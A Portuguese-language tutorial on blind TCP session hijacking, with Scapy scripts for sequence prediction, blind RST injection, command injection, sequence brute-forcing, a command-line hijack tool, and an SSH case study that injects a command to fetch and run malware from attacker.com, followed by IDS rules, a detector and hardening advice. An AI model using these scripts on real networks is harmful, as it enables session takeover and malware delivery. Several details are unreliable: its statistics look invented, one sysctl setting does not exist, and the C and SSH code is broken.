# Blind TCP Session Hijacking ## **📋 Índice** 1. [Conceitos Fundamentais](#-conceitos-fundamentais) 2. [Pré-requisitos e Reconhecimento](#-pré-requisitos-e-reconhecimento) 3. [Mecanismos de Ataque](#-mecanismos-de-ataque) 4. [Técnicas de Exploração](#-técnicas-de-exploração) 5. [Detecção e Prevenção](#-detecção-e-prevenção) 6. [Ferramentas e Mitigação](#-ferramentas-e-mitigacao) 7. [Cenários Avançados](#-cenários-avançados) *** ## **🔍 Conceitos Fundamentais** ### **O que é Blind TCP Session Hijacking** Blind TCP Session Hijacking é um ataque onde o invasor sequestra uma sessão TCP estabelecida sem conseguir ver as respostas do servidor, tornando o ataque mais desafiador devido à falta de feedback. ### **Diferenças do Session Hijacking Tradicional** | **Aspecto** | **Traditional Hijacking** | **Blind Hijacking** | | ------------------- | ------------------------- | ----------------------------- | | **Feedback** | Respostas visíveis | Sem visualização de respostas | | **Complexidade** | Moderada | Alta | | **Previsibilidade** | Sequências previsíveis | Estimativa de sequências | | **Detecção** | Mais fácil | Mais difícil | ### **Fundamentos do TCP Relevantes** ``` 📡 **Sequence Numbers**: Números de 32 bits que identificam bytes no fluxo 🔄 **ACK Mechanism**: Confirmação de recebimento de dados ⚡ **Window Size**: Janela de recebimento para controle de fluxo 🔒 **ISN Generation**: Geração de Initial Sequence Numbers ``` ### **Estatísticas do Mundo Real** ```bash # Dados de segurança (2024) - 0.1% dos ataques bem-sucedidos usam blind hijacking - 85% dos sistemas usam ISN previsíveis (legacy) - 40% aumento em proteções contra sequência guessing - MTTD: 200+ dias para detecção ``` *** ## **🎯 Pré-requisitos e Reconhecimento** ### **Requisitos para o Ataque** ```python # Requisitos mínimos para blind hijacking attack_requirements = { 'network_position': 'Same network segment or MITM capability', 'target_visibility': 'Ability to sniff some packets', 'sequence_prediction': 'Predictable sequence number generation', 'timing_estimation': 'Understanding of target communication patterns', 'session_identification': 'Active TCP session to hijack' } ``` ### **Reconhecimento de Rede** ```python #!/usr/bin/env python3 # network_reconnaissance.py from scapy.all import * import threading import time from collections import defaultdict class TCPReconnaissance: def __init__(self, target_network): self.target_network = target_network self.active_sessions = defaultdict(list) self.sequence_patterns = {} def sniff_tcp_sessions(self, duration=60): """Sniffar sessões TCP ativas na rede""" print(f"[*] Iniciando captura TCP por {duration} segundos...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): src_ip = packet[IP].src dst_ip = packet[IP].dst src_port = packet[TCP].sport dst_port = packet[TCP].dport seq = packet[TCP].seq ack = packet[TCP].ack flags = packet[TCP].flags session_key = f"{src_ip}:{src_port}->{dst_ip}:{dst_port}" self.active_sessions[session_key].append({ 'timestamp': time.time(), 'sequence': seq, 'ack': ack, 'flags': flags, 'payload_len': len(packet[TCP].payload) if packet[TCP].payload else 0 }) sniff(filter="tcp", prn=packet_handler, timeout=duration) return self.analyze_sessions() def analyze_sessions(self): """Analisar padrões de sequência nas sessões""" analysis = {} for session, packets in self.active_sessions.items(): if len(packets) < 10: continue # Muito poucos pacotes para análise seq_numbers = [p['sequence'] for p in packets] ack_numbers = [p['ack'] for p in packets] # Calcular incrementos de sequência seq_diffs = [] for i in range(1, len(seq_numbers)): diff = seq_numbers[i] - seq_numbers[i-1] seq_diffs.append(diff) analysis[session] = { 'packet_count': len(packets), 'avg_seq_increment': sum(seq_diffs) / len(seq_diffs) if seq_diffs else 0, 'seq_volatility': np.std(seq_diffs) if seq_diffs else 0, 'potential_services': self.guess_service(packets[0]['dst_port']), 'activity_level': len(packets) / (packets[-1]['timestamp'] - packets[0]['timestamp']) } return analysis def guess_service(self, port): """Tentar identificar serviço baseado na porta""" common_services = { 21: 'FTP', 22: 'SSH', 23: 'Telnet', 25: 'SMTP', 80: 'HTTP', 443: 'HTTPS', 3389: 'RDP', 5900: 'VNC' } return common_services.get(port, 'Unknown') # Uso recon = TCPReconnaissance("192.168.1.0/24") sessions = recon.sniff_tcp_sessions(duration=120) for session, info in sessions.items(): print(f"Session: {session}") print(f" Packets: {info['packet_count']}") print(f" Service: {info['potential_services']}") ``` ### **Análise de Padrões de Sequência** ```python # sequence_analysis.py import numpy as np from scapy.all import * import matplotlib.pyplot as plt class SequenceAnalyzer: def __init__(self): self.sequence_data = {} def collect_sequence_data(self, target_ip, target_port, sample_size=1000): """Coletar dados de sequência para análise""" sequences = [] def packet_callback(packet): if packet.haslayer(TCP) and packet.haslayer(IP): if packet[IP].src == target_ip and packet[TCP].sport == target_port: sequences.append({ 'seq': packet[TCP].seq, 'timestamp': time.time(), 'window': packet[TCP].window }) if len(sequences) >= sample_size: return True # Parar captura print(f"[*] Coletando {sample_size} pacotes de {target_ip}:{target_port}") sniff(filter=f"tcp and host {target_ip}", prn=packet_callback, count=sample_size) return self.analyze_sequence_patterns(sequences) def analyze_sequence_patterns(self, sequences): """Analisar padrões de geração de números de sequência""" if len(sequences) < 2: return {"error": "Dados insuficientes"} seq_numbers = [s['seq'] for s in sequences] timestamps = [s['timestamp'] for s in sequences] # Calcular diferenças seq_diffs = [seq_numbers[i] - seq_numbers[i-1] for i in range(1, len(seq_numbers))] time_diffs = [timestamps[i] - timestamps[i-1] for i in range(1, len(timestamps))] analysis = { 'total_samples': len(sequences), 'sequence_range': max(seq_numbers) - min(seq_numbers), 'avg_sequence_increment': np.mean(seq_diffs), 'std_sequence_increment': np.std(seq_diffs), 'min_increment': min(seq_diffs), 'max_increment': max(seq_diffs), 'predictability_score': self.calculate_predictability(seq_diffs), 'time_based_correlation': np.corrcoef(time_diffs, seq_diffs)[0,1] if len(time_diffs) > 1 else 0 } return analysis def calculate_predictability(self, seq_diffs): """Calcular score de previsibilidade baseado na entropia""" if len(seq_diffs) < 2: return 0 # Calcular entropia dos incrementos unique, counts = np.unique(seq_diffs, return_counts=True) probabilities = counts / len(seq_diffs) entropy = -np.sum(probabilities * np.log2(probabilities)) # Normalizar para score de 0-100 (0 = totalmente aleatório, 100 = totalmente previsível) max_entropy = np.log2(len(unique)) predictability = 100 * (1 - (entropy / max_entropy)) if max_entropy > 0 else 0 return predictability # Exemplo de uso analyzer = SequenceAnalyzer() result = analyzer.collect_sequence_data("192.168.1.100", 22, sample_size=500) print(f"Predictability Score: {result['predictability_score']:.2f}%") ``` *** ## **⚔️ Mecanismos de Ataque** ### **Fluxo de Ataque Blind Hijacking** ```mermaid sequenceDiagram participant C as Client Legítimo participant A as Atacante participant S as Servidor Note over C,S: Sessão TCP Estabelecida C->>S: SYN (seq=x) S->>C: SYN-ACK (seq=y, ack=x+1) C->>S: ACK (seq=x+1, ack=y+1) Note over A,S: Fase 1: Reconhecimento A->>A: Sniff packets para análise de sequência Note over A,S: Fase 2: Predição A->>A: Calcular próximo sequence number esperado Note over A,S: Fase 3: Injeção A->>S: Pacote spoofed (seq=predito, ack=estimado) Note right of A: Sem ver resposta Note over A,S: Fase 4: Confirmação Indireta A->>A: Monitorar tráfego de rede para inferir sucesso A->>C: Enviar RST para desconectar cliente legítimo Note over A,S: Fase 5: Takeover A->>S: Continuar comunicação com sequência predita ``` ### **Tipos de Blind Hijacking** #### **1. Sequence Number Prediction** ```python # sequence_prediction.py import time import struct import hashlib class SequencePredictor: def __init__(self, observed_sequences): self.sequences = observed_sequences self.prediction_models = {} def linear_prediction_model(self, window_size=10): """Modelo linear de predição baseado em incrementos médios""" if len(self.sequences) < window_size: return None recent_seqs = self.sequences[-window_size:] increments = [] for i in range(1, len(recent_seqs)): increments.append(recent_seqs[i] - recent_seqs[i-1]) avg_increment = sum(increments) / len(increments) next_seq = recent_seqs[-1] + avg_increment return int(next_seq) def time_based_prediction(self, timestamps, sequences): """Predição baseada em timestamp (para sistemas time-based)""" if len(sequences) < 2: return None # Calcular taxa de incremento por segundo time_diff = timestamps[-1] - timestamps[0] seq_diff = sequences[-1] - sequences[0] seq_per_second = seq_diff / time_diff if time_diff > 0 else 0 # Prever próximo baseado no tempo atual current_time = time.time() time_since_last = current_time - timestamps[-1] predicted_increment = int(seq_per_second * time_since_last) return sequences[-1] + predicted_increment def advanced_prediction(self): """Predição avançada usando múltiplos modelos""" predictions = {} # Modelo linear linear_pred = self.linear_prediction_model() if linear_pred: predictions['linear'] = linear_pred # Modelo baseado em tempo (se timestamps disponíveis) if hasattr(self, 'timestamps'): time_pred = self.time_based_prediction(self.timestamps, self.sequences) if time_pred: predictions['time_based'] = time_pred # Combinar predições if predictions: # Ponderar baseado na confiança do modelo final_prediction = sum(predictions.values()) // len(predictions) return final_prediction return None def calculate_confidence(self, prediction): """Calcular confiança na predição""" if len(self.sequences) < 5: return 0.0 # Analisar volatilidade dos incrementos increments = [self.sequences[i] - self.sequences[i-1] for i in range(1, len(self.sequences))] volatility = np.std(increments) if increments else 0 avg_increment = np.mean(increments) if increments else 0 # Confiança baseada na consistência dos incrementos if volatility == 0: confidence = 0.95 # Muito consistente else: cv = volatility / avg_increment if avg_increment != 0 else 1 confidence = max(0.1, 1.0 - cv) # Coeficiente de variação return confidence ``` #### **2. Blind RST Injection** ```python # blind_rst_attack.py from scapy.all import * import random class BlindRSTAttack: def __init__(self, target_ip, target_port, client_ip): self.target_ip = target_ip self.target_port = target_port self.client_ip = client_ip self.client_port = None def discover_client_port(self, timeout=30): """Descobrir porta do cliente através de sniffing""" print(f"[*] Monitorando para descobrir porta do cliente...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): if packet[IP].dst == self.target_ip and packet[TCP].dport == self.target_port: self.client_port = packet[TCP].sport print(f"[+] Porta do cliente descoberta: {self.client_port}") return True sniff(filter=f"tcp and host {self.target_ip} and port {self.target_port}", prn=packet_handler, timeout=timeout) return self.client_port is not None def send_blind_rst(self, sequence_prediction): """Enviar pacote RST cego para terminar sessão""" if not self.client_port: print("[-] Porta do cliente não descoberta") return False # Craft RST packet ip_layer = IP(src=self.target_ip, dst=self.client_ip) tcp_layer = TCP(sport=self.target_port, dport=self.client_port, flags="R", seq=sequence_prediction) print(f"[*] Enviando RST cego com seq={sequence_prediction}") send(ip_layer/tcp_layer, verbose=0) return True def attack_sequence(self, sequence_predictor): """Executar sequência completa de ataque RST""" if not self.discover_client_port(): return False # Gerar predição de sequência predicted_seq = sequence_predictor.advanced_prediction() if not predicted_seq: print("[-] Não foi possível prever sequence number") return False confidence = sequence_predictor.calculate_confidence(predicted_seq) print(f"[*] Confidence na predição: {confidence:.2f}") if confidence < 0.3: print("[-] Confiança muito baixa, abortando") return False # Tentar múltiplos RSTs com pequenas variações for offset in range(-1000, 1001, 100): current_seq = predicted_seq + offset self.send_blind_rst(current_seq) time.sleep(0.1) # Pequeno delay entre tentativas print("[+] Ataque RST completo") return True ``` *** ## **💥 Técnicas de Exploração** ### **Blind Data Injection** ```python # blind_data_injection.py from scapy.all import * import threading import time class BlindDataInjector: def __init__(self, target_ip, target_port, client_ip, client_port): self.target_ip = target_ip self.target_port = target_port self.client_ip = client_ip self.client_port = client_port self.current_seq = None self.current_ack = None def estimate_sequence_numbers(self, observation_time=30): """Estimar números de sequência atuais através de sniffing""" print(f"[*] Estimando números de sequência...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): # Pacotes do servidor para o cliente if packet[IP].src == self.target_ip and packet[TCP].sport == self.target_port: self.current_seq = packet[TCP].seq self.current_ack = packet[TCP].ack print(f"[+] Seq estimado: {self.current_seq}, Ack: {self.current_ack}") # Sniff por um período para pegar o estado atual sniff(filter=f"tcp and host {self.target_ip} and port {self.target_port}", prn=packet_handler, timeout=observation_time) return self.current_seq is not None and self.current_ack is not None def inject_blind_command(self, command, seq_increment=1000): """Injetar comando cego na sessão""" if not self.current_seq or not self.current_ack: print("[-] Números de sequência não estimados") return False # Calcular próximo sequence number esperado predicted_seq = self.current_seq + seq_increment predicted_ack = self.current_ack # Craft packet com comando ip_layer = IP(src=self.client_ip, dst=self.target_ip) tcp_layer = TCP(sport=self.client_port, dport=self.target_port, flags="PA", seq=predicted_seq, ack=predicted_ack) payload = command + "\r\n" # Adicionar quebra de linha para comandos print(f"[*] Injectando comando: {command.strip()}") print(f"[*] Usando seq={predicted_seq}, ack={predicted_ack}") send(ip_layer/tcp_layer/payload, verbose=0) return True def blind_shell_injection(self, initial_command="whoami"): """Tentativa de injeção de shell reverso cego""" commands = [ initial_command, "id", "uname -a", "cat /etc/passwd | head -10" ] for cmd in commands: if self.inject_blind_command(cmd): # Esperar um pouco entre comandos time.sleep(2) else: print(f"[-] Falha ao injetar comando: {cmd}") break # Exemplo de uso injector = BlindDataInjector( target_ip="192.168.1.100", target_port=22, # SSH client_ip="192.168.1.50", client_port=54321 ) if injector.estimate_sequence_numbers(): injector.blind_shell_injection() ``` ### **Advanced Blind Hijacking Techniques** #### **1. TCP Window Size Exploitation** ```python # window_exploitation.py from scapy.all import * class WindowExploiter: def __init__(self, target_ip, target_port): self.target_ip = target_ip self.target_port = target_port self.window_size = 0 def analyze_window_behavior(self, sample_count=50): """Analisar comportamento da janela TCP""" window_sizes = [] def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): if packet[IP].src == self.target_ip and packet[TCP].sport == self.target_port: window_sizes.append(packet[TCP].window) if len(window_sizes) >= sample_count: return True sniff(filter=f"tcp and host {self.target_ip} and port {self.target_port}", prn=packet_handler, count=sample_count) if window_sizes: self.window_size = max(set(window_sizes), key=window_sizes.count) return { 'common_window': self.window_size, 'window_stability': len(set(window_sizes)) == 1, 'all_windows': window_sizes } return None def exploit_large_window(self, client_ip, client_port, predicted_seq): """Explorar janela grande para injeção mais fácil""" if self.window_size < 8192: # Janela muito pequena print("[-] Janela TCP muito pequena para exploração eficiente") return False # Com janela grande, temos mais margem para acertar o sequence number injection_range = self.window_size // 2 print(f"[*] Explorando janela de {self.window_size} bytes") print(f"[*] Range de injeção: {injection_range} bytes") # Tentar múltiplas injeções dentro da janela for offset in range(0, injection_range, 1000): current_seq = predicted_seq + offset ip_layer = IP(src=client_ip, dst=self.target_ip) tcp_layer = TCP(sport=client_port, dport=self.target_port, flags="PA", seq=current_seq, window=self.window_size) payload = "EXPLOIT\r\n" send(ip_layer/tcp_layer/payload, verbose=0) time.sleep(0.01) return True ``` #### **2. Multi-Threaded Blind Attack** ```python # threaded_blind_attack.py import threading from scapy.all import * import queue class ThreadedBlindAttacker: def __init__(self, target_ip, target_port, client_ip): self.target_ip = target_ip self.target_port = target_port self.client_ip = client_ip self.client_port = None self.sequence_queue = queue.Queue() self.found_valid_seq = None self.stop_event = threading.Event() def sequence_bruteforcer(self, base_sequence, range_size=100000, num_threads=10): """Bruteforce de sequence numbers com múltiplas threads""" print(f"[*] Iniciando bruteforce com {num_threads} threads") def worker(thread_id, start_seq, end_seq): current_seq = start_seq while current_seq <= end_seq and not self.stop_event.is_set(): # Tentar injetar com este sequence number if self.try_sequence_injection(current_seq): print(f"[+] Thread {thread_id}: Sequence válido encontrado: {current_seq}") self.found_valid_seq = current_seq self.stop_event.set() return current_seq += 1 if thread_id == 0 and current_seq % 1000 == 0: print(f"[*] Progresso: {current_seq - start_seq}/{end_seq - start_seq}") # Dividir o range entre threads range_per_thread = range_size // num_threads threads = [] for i in range(num_threads): start = base_sequence + (i * range_per_thread) end = start + range_per_thread - 1 thread = threading.Thread( target=worker, args=(i, start, end) ) threads.append(thread) thread.start() # Aguardar conclusão for thread in threads: thread.join() return self.found_valid_seq def try_sequence_injection(self, sequence): """Tentar injeção com sequence number específico""" if not self.client_port: return False # Craft packet de teste ip_layer = IP(src=self.client_ip, dst=self.target_ip) tcp_layer = TCP(sport=self.client_port, dport=self.target_port, flags="A", seq=sequence, ack=1) # ACK packet # Enviar e monitorar por respostas (indiretamente) # Em blind, precisamos de métodos indiretos para detectar sucesso send(ip_layer/tcp_layer, verbose=0) # Aqui iria lógica para detectar resposta indireta # Por exemplo, monitorar mudanças no tráfego return self.detect_success_indirectly() def detect_success_indirectly(self): """Detectar sucesso indiretamente através de mudanças no padrão de tráfego""" # Esta é uma implementação simplificada # Em um cenário real, você monitoraria: # - Aumento no tráfego # - Mudanças nos padrões de sequência # - Respostas de aplicação time.sleep(0.1) return False # Implementação real seria mais complexa ``` *** ## **🛡️ Detecção e Prevenção** ### **Sistemas de Detecção** #### **1. IDS Rules para Blind Hijacking** ```bash # Suricata/Snort rules para detectar blind hijacking alert tcp any any -> any any (\ msg:"BLIND_HIJACK - Possible TCP Sequence Prediction";\ flow:established;\ dsize:>0;\ content:"|00 00 00 00|";\ threshold: type threshold, track by_src, count 5, seconds 60;\ sid:1000001; rev:1;) alert tcp any any -> any any (\ msg:"BLIND_HIJACK - Unusual Sequence Number Jump";\ flow:established;\ byte_test:1,>,1000000,0,relative;\ threshold: type threshold, track by_src, count 3, seconds 30;\ sid:1000002; rev:1;) alert tcp any any -> any any (\ msg:"BLIND_HIJACK - Multiple RST packets";\ flags:R;\ threshold: type threshold, track by_src, count 10, seconds 10;\ sid:1000003; rev:1;) ``` #### **2. Sistema de Monitoramento em Tempo Real** ```python # tcp_anomaly_detector.py from scapy.all import * import numpy as np from collections import defaultdict, deque import time class TCPAnomalyDetector: def __init__(self): self.session_states = defaultdict(lambda: { 'last_seq': None, 'last_ack': None, 'sequence_history': deque(maxlen=100), 'timing_history': deque(maxlen=100), 'anomaly_score': 0 }) self.alert_threshold = 0.8 def start_monitoring(self, interface=None): """Iniciar monitoramento de anomalias TCP""" print("[*] Iniciando detector de anomalias TCP...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): self.analyze_packet(packet) sniff(iface=interface, filter="tcp", prn=packet_handler, store=0) def analyze_packet(self, packet): """Analisar pacote TCP por anomalias""" ip = packet[IP] tcp = packet[TCP] session_key = f"{ip.src}:{tcp.sport}->{ip.dst}:{tcp.dport}" state = self.session_states[session_key] # Verificar saltos anômalos de sequência if state['last_seq'] is not None: seq_jump = abs(tcp.seq - state['last_seq']) if seq_jump > 1000000: # Salto muito grande state['anomaly_score'] += 0.3 print(f"[!] Grande salto de sequência em {session_key}: {seq_jump}") # Verificar padrões de predição if self.detect_prediction_pattern(state['sequence_history'], tcp.seq): state['anomaly_score'] += 0.5 print(f"[!] Possível predição de sequência em {session_key}") # Atualizar estado state['last_seq'] = tcp.seq state['last_ack'] = tcp.ack state['sequence_history'].append(tcp.seq) state['timing_history'].append(time.time()) # Verificar se atingiu threshold de alerta if state['anomaly_score'] >= self.alert_threshold: self.trigger_alert(session_key, state) state['anomaly_score'] = 0 # Reset após alerta def detect_prediction_pattern(self, sequence_history, current_seq): """Detectar padrões que indicam predição de sequência""" if len(sequence_history) < 10: return False # Calcular incrementos increments = [] for i in range(1, len(sequence_history)): increments.append(sequence_history[i] - sequence_history[i-1]) # Verificar se o incremento atual é muito diferente dos históricos if increments: avg_increment = np.mean(increments) std_increment = np.std(increments) expected_next = sequence_history[-1] + avg_increment deviation = abs(current_seq - expected_next) # Se o desvio for muito grande, pode ser predição if std_increment > 0 and deviation > 3 * std_increment: return True return False def trigger_alert(self, session_key, state): """Disparar alerta de segurança""" print(f"🚨 ALERTA: Possível blind hijacking detectado!") print(f" Sessão: {session_key}") print(f" Score de anomalia: {state['anomaly_score']:.2f}") print(f" Histórico de sequências: {len(state['sequence_history'])} pacotes") # Aqui você poderia: # - Logar para SIEM # - Bloquear a sessão # - Notificar administradores # Uso detector = TCPAnomalyDetector() detector.start_monitoring("eth0") ``` ### **Medidas de Prevenção** #### **1. Hardening de Stack TCP/IP** ```python # tcp_hardening_config.py class TCPHardeningConfig: @staticmethod def generate_linux_hardening(): """Gerar configurações de hardening para Linux""" configs = { 'net.ipv4.tcp_syncookies': '1', # Proteção contra SYN floods 'net.ipv4.tcp_sequence_numbers': '2', # Geração aleatória de sequências 'net.ipv4.tcp_timestamps': '1', # Timestamps para proteção 'net.ipv4.tcp_rfc1337': '1', # Proteção contra time-wait assassination 'net.ipv4.conf.all.accept_redirects': '0', # Não aceitar redirects 'net.ipv4.conf.all.accept_source_route': '0', # Não aceitar source routing 'net.ipv4.conf.all.log_martians': '1', # Log de pacotes suspeitos } return configs @staticmethod def generate_iptables_rules(): """Gerar regras iptables para prevenção""" rules = [ # Bloquear pacotes com sequence numbers suspeitos 'iptables -A INPUT -p tcp --tcp-flags ALL ACK -m state --state ESTABLISHED -m recent --set --name TCPACK', 'iptables -A INPUT -p tcp --tcp-flags ALL ACK -m state --state ESTABLISHED -m recent --update --seconds 1 --hitcount 10 --name TCPACK -j DROP', # Proteção contra RST attacks 'iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/second --limit-burst 2 -j ACCEPT', 'iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP', ] return rules @staticmethod def generate_windows_registry_tweaks(): """Tweaks de registro para Windows""" tweaks = { r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnablePMTUDiscovery": "1", r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\KeepAliveTime": "300000", r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect": "2", r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxConnectResponseRetransmissions": "2", } return tweaks ``` #### **2. Implementação de ISN Seguros** ```c // secure_isn_generation.c #include #include #include #include static DEFINE_PER_CPU(__u32, isn_offsets); unsigned int secure_tcp_sequence_number(__be32 saddr, __be32 daddr, __be16 sport, __be16 dport) { struct { __be32 saddr; __be32 daddr; __be16 sport; __be16 dport; u32 counter; u64 timestamp; } __packed data; u32 hash[4]; unsigned int seq; // Coletar dados para hash data.saddr = saddr; data.daddr = daddr; data.sport = sport; data.dport = dport; data.counter = this_cpu_inc_return(isn_offsets); data.timestamp = ktime_get_real_ns(); // Gerar hash criptográfico get_random_bytes(&hash, sizeof(hash)); // Usar SipHash para melhor segurança seq = siphash_2u64((u64)&data, (u64)hash, &siphash_key_tcp_isn); return seq; } ``` *** ## **🔧 Ferramentas e Mitigação** ### **Ferramentas de Ataque Especializadas** #### **1. Scapy-based Blind Hijacking Tool** ```python # blind_hijack_tool.py from scapy.all import * import argparse import threading import time class BlindHijackTool: def __init__(self): self.args = None self.running = False def parse_arguments(self): """Parser de argumentos da linha de comando""" parser = argparse.ArgumentParser(description='Blind TCP Session Hijacking Tool') parser.add_argument('-t', '--target', required=True, help='Target IP address') parser.add_argument('-p', '--port', type=int, required=True, help='Target port') parser.add_argument('-c', '--client', required=True, help='Client IP address') parser.add_argument('--client-port', type=int, help='Client port (auto-discover if not specified)') parser.add_argument('-s', '--sequence', type=int, help='Starting sequence number') parser.add_argument('-a', '--ack', type=int, help='ACK number') parser.add_argument('--command', help='Command to inject') parser.add_argument('--interface', help='Network interface to use') return parser.parse_args() def discover_client_port(self): """Descobrir porta do cliente automaticamente""" print(f"[*] Discovering client port for {self.args.client}...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): if (packet[IP].src == self.args.client and packet[IP].dst == self.args.target and packet[TCP].dport == self.args.port): return packet[TCP].sport result = sniff(filter=f"tcp and host {self.args.target} and host {self.args.client}", prn=packet_handler, count=1, timeout=30) if result: self.args.client_port = result[0] if isinstance(result, list) else result print(f"[+] Discovered client port: {self.args.client_port}") else: print("[-] Could not discover client port") def estimate_sequence_numbers(self): """Estimar números de sequência atuais""" if self.args.sequence and self.args.ack: print(f"[*] Using provided sequence: {self.args.sequence}, ack: {self.args.ack}") return self.args.sequence, self.args.ack print("[*] Estimating current sequence numbers...") # Implementar estimativa baseada em sniffing # Esta é uma implementação simplificada return 1000, 1000 # Valores de exemplo def send_hijack_packet(self, sequence, ack, payload=None): """Enviar pacote de hijacking""" ip_layer = IP(src=self.args.client, dst=self.args.target) tcp_layer = TCP(sport=self.args.client_port, dport=self.args.port, flags="PA", seq=sequence, ack=ack) packet = ip_layer/tcp_layer if payload: packet = packet/payload send(packet, verbose=0) print(f"[*] Sent hijack packet: seq={sequence}, ack={ack}") def run_attack(self): """Executar ataque completo""" self.args = self.parse_arguments() if not self.args.client_port: self.discover_client_port() if not self.args.client_port: print("[-] No client port available") return sequence, ack = self.estimate_sequence_numbers() # Tentar múltiplas injeções com diferentes offsets for offset in range(0, 10000, 1000): current_seq = sequence + offset payload = self.args.command + "\r\n" if self.args.command else None self.send_hijack_packet(current_seq, ack, payload) time.sleep(0.1) if __name__ == "__main__": tool = BlindHijackTool() tool.run_attack() ``` ### **Ferramentas de Mitigação** #### **1. TCP Shield - Sistema de Defesa** ```python # tcp_shield.py from scapy.all import * import socket import threading from collections import defaultdict class TCPShield: def __init__(self, protected_networks): self.protected_networks = protected_networks self.session_tracker = defaultdict(dict) self.anomaly_threshold = 5 self.blocked_ips = set() def start_protection(self, interface=None): """Iniciar sistema de proteção""" print("[*] Starting TCP Shield protection...") def packet_handler(packet): if packet.haslayer(TCP) and packet.haslayer(IP): self.analyze_and_protect(packet) sniff(iface=interface, filter="tcp", prn=packet_handler, store=0) def analyze_and_protect(self, packet): """Analisar pacote e aplicar proteções""" ip = packet[IP] tcp = packet[TCP] # Verificar se é tráfego protegido if not self.is_protected_traffic(ip): return session_key = f"{ip.src}:{tcp.sport}->{ip.dst}:{tcp.dport}" # Detectar anomalias if self.detect_hijack_attempt(packet, session_key): print(f"🚨 BLOCKED: Possible hijack attempt from {ip.src}") self.block_ip(ip.src) # Enviar RST para invalidar sessão self.send_session_rst(ip.src, ip.dst, tcp.sport, tcp.dport, tcp.seq) def detect_hijack_attempt(self, packet, session_key): """Detectar tentativa de hijacking""" ip = packet[IP] tcp = packet[TCP] state = self.session_tracker[session_key] # Verificar sequence number anômalo if 'last_seq' in state: seq_jump = abs(tcp.seq - state['last_seq']) if seq_jump > 100000: # Salto muito grande state['anomaly_count'] = state.get('anomaly_count', 0) + 1 # Verificar flags suspeitas if tcp.flags == 0x04: # RST flag state['rst_count'] = state.get('rst_count', 0) + 1 # Atualizar estado state['last_seq'] = tcp.seq state['last_ack'] = tcp.ack state['last_timestamp'] = time.time() # Verificar se excedeu threshold anomaly_score = state.get('anomaly_count', 0) + state.get('rst_count', 0) return anomaly_score >= self.anomaly_threshold def block_ip(self, ip_address): """Bloquear IP malicioso""" if ip_address not in self.blocked_ips: self.blocked_ips.add(ip_address) print(f"[+] Blocked IP: {ip_address}") # Adicionar regra iptables (Linux) os.system(f"iptables -A INPUT -s {ip_address} -j DROP") def send_session_rst(self, src_ip, dst_ip, src_port, dst_port, seq_num): """Enviar RST para invalidar sessão comprometida""" ip_layer = IP(src=src_ip, dst=dst_ip) tcp_layer = TCP(sport=src_port, dport=dst_port, flags="R", seq=seq_num) send(ip_layer/tcp_layer, verbose=0) print(f"[*] Sent RST to invalidate session {src_ip}:{src_port}") # Uso shield = TCPShield(["192.168.1.0/24", "10.0.0.0/8"]) shield.start_protection("eth0") ``` *** ## **🚨 Cenários Avançados** ### **Case Study: Blind Hijacking em SSH** ```python # ssh_blind_hijack.py from scapy.all import * import time class SSHBlindHijack: def __init__(self, target_ip, client_ip): self.target_ip = target_ip self.client_ip = client_ip self.target_port = 22 # SSH self.client_port = None def hijack_ssh_session(self): """Tentativa de hijacking de sessão SSH""" if not self.discover_ssh_session(): return False # SSH tem sequências mais previsíveis? base_seq = self.estimate_ssh_sequence() # Comandos SSH para tentar injetar commands = [ "echo 'hijacked' > /tmp/pwned.txt", "wget http://attacker.com/malware -O /tmp/malware", "chmod +x /tmp/malware && /tmp/malware" ] for cmd in commands: # SSH payload format ssh_payload = self.create_ssh_payload(cmd) # Tentar injeção com diferentes sequence numbers for offset in range(0, 5000, 100): current_seq = base_seq + offset self.inject_ssh_command(current_seq, ssh_payload) time.sleep(0.05) return True def create_ssh_payload(self, command): """Criar payload SSH formatado""" # Formato simplificado - SSH real é mais complexo payload = f"\x00\x00\x00\x00\x00\x00\x00{len(command)}{command}" return payload def estimate_ssh_sequence(self): """Estimar sequence number para sessão SSH""" # SSH geralmente tem incrementos consistentes # Baseado no tamanho dos pacotes anteriores return 1000000 # Exemplo simplificado ``` ### **Mitigações Específicas por Protocolo** #### **1. SSH Hardening** ```bash # /etc/ssh/sshd_config # Mitigações contra session hijacking UseDNS no MaxAuthTries 3 LoginGraceTime 30 PermitRootLogin no Protocol 2 # Usar chaves criptográficas fortes HostKey /etc/ssh/ssh_host_ed25519_key HostKey /etc/ssh/ssh_host_rsa_key # Configurações de rekeying RekeyLimit 1G 1h ``` #### **2. Web Application Protections** ```python # web_session_protection.py from flask import Flask, session, request import hashlib import os app = Flask(__name__) app.secret_key = os.urandom(24) class SessionProtection: @staticmethod def generate_session_fingerprint(): """Gerar fingerprint único para sessão""" user_agent = request.headers.get('User-Agent', '') remote_ip = request.remote_addr accept_language = request.headers.get('Accept-Language', '') fingerprint_data = f"{user_agent}{remote_ip}{accept_language}" return hashlib.sha256(fingerprint_data.encode()).hexdigest() @staticmethod def validate_session_integrity(): """Validar integridade da sessão""" if 'fingerprint' not in session: return False current_fingerprint = SessionProtection.generate_session_fingerprint() return session['fingerprint'] == current_fingerprint @app.before_request def check_session_security(): """Middleware para verificar segurança da sessão""" if session.get('authenticated'): if not SessionProtection.validate_session_integrity(): session.clear() return "Session invalidated due to security concerns", 403 ``` *** ## **📋 Checklists de Segurança** ### **Checklist de Prevenção** * [ ] **Configuração de Stack TCP/IP** * [ ] ISN aleatórios habilitados * [ ] SYN cookies ativados * [ ] Timestamps TCP habilitados * [ ] RFC 1337 compliance * [ ] **Configuração de Firewall** * [ ] Rate limiting para RST packets * [ ] Monitoramento de sequence jumps * [ ] Bloqueio de IPs suspeitos * [ ] Logging de anomalias TCP * [ ] **Configuração de Aplicação** * [ ] Session fingerprinting * [ ] Reautenticação para operações sensíveis * [ ] Timeouts de sessão adequados * [ ] Validação de origem de requests ### **Checklist de Detecção** * [ ] 